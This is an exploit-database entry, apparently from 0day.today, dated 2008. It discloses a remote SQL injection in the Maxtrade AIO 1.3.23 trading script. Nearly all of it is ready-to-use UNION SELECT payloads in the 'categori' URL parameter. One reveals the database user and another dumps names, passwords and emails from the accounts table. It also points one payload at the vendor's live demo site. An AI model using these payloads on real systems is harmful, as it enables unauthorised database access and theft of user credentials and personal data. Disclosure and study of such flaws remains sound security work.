id: 3214
date: 06/17/2008
title: Maxtrade AIO 1.3.23 (categori) Remote SQL Injection Vulnerability
author: HaCkeR_EgY
cves: 

=================================================================
Maxtrade AIO 1.3.23 (categori) Remote SQL Injection Vulnerability
=================================================================



##########################################################
############# Remote SQL Injection Maxtrade AIO 1.3.23 ... ##############
## HaCker_Egy
===============================================
# Script : Maxtrade
# Version : 1.3.23
# Download : http://softdivision.com
===============================================
# Exploit :
           ==>> www.target.com//modules.php?module=trade&function=pocategorisell&cat=0&stranica=menu&categori=-1+union+select+current_user,2/*
         
     ==>> www.target.com//modules.php?module=trade&function=pocategorisell&cat=0&stranica=menu&categori=-1+union+select+concat_ws(0x3a3a,name,password,email),2+from+accounts/*
    
# live Demo :
             
    ==>> http://softdivision.com/maxtradedemo/modules.php?module=trade&function=pocategorisell&cat=0&stranica=menu&categori=-1+union+select+current_user,2/* 
   
===============================================================



#  0day.today [2023-03-21]  #